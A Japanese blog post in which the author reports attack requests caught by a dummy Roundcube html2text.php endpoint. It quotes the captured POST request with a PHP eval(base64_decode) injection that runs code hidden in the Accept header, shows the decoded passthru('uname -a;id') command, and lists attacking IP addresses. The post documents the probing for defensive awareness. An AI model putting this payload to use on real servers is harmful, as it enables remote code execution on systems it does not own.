昨日書いた記事の続報なんですが、機械的にGETのリクエストでmsgimport探しているだけ(無ければ404になるだけ)なのでほっといたんですが、思い立ってダミーでmsgimport作ってみたらPOSTリクエストが来ました。
POST /bin/html2text.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 Host: 内緒w (中略) <b>{${EVAL(BASE64_DECODE($_SERVER[HTTP_ACCEPT]))}}</b>
SANS記事からたどっていったところ(http://trac.roundcube.net/ticket/1485618)のコメント欄と同じ感じですね。
まーSQLインジェクションはAsproxボットネットが崩壊したあとも活発みたいだし、今でもいろんなの来てますねえ。
関連記事:迷惑メール業者「米マコロ」崩壊で,スパムの流量が減りボットネット「Asprox」の活動が低下 | 日経 xTECH(クロステック)
定期的にいろんな国から訪問いただくことは喜ばしい(笑)限りなんですが、今更追いかけて追加情報を出すほどでもなさそうだし、そろそろウザくなってきたのでGuardian@JUMPERZ.NETでたたき落とすかなあ ブフッ∵(´ε(○=(゚∀゚ )
yamagataさんの要望があったのでわかってるところまで追記しときますと、Acceptヘッダの文字列はすぐBASE64変換してみたんだけど、こんな感じですた。
echo (6桁の数字+8桁の数字)." ";;passthru("uname -a;id");
echoの数字の処に何かからくりがあるんだろうけど、そこまだわかんないのでヘッダ隠してる(笑)んですよねー。
手元に来ているのはこんなところから(一部だけだよんw)。
- 192.116.71.51
- 200.85.152.236
- 202.64.77.93
- 203.81.55.161
- 209.160.20.34
- 209.160.64.190
- 209.250.250.137
- 212.95.32.171
- 216.245.217.122
- 218.22.69.25
- 218.247.40.136
- 58.215.88.10
- 61.19.249.19
- 64.18.158.36
- 64.85.162.58
- 67.159.5.184
- 67.205.76.148
- 67.214.166.138
- 67.215.6.210
- 72.232.177.10
- 72.9.153.205
- 78.159.112.98
- 78.41.202.180
- 78.41.206.116
- 78.41.206.228
- 79.99.132.6
- 83.170.93.18
- 84.244.130.30
- 85.112.3.98
- 87.233.176.117
- 87.98.219.144
- 89.149.196.216
- 91.196.169.226
- 92.48.127.158
- 93.84.112.158
- 94.102.51.174
- 94.76.206.2
あからさまに分散的なので、まーそういうことなんでしょうね。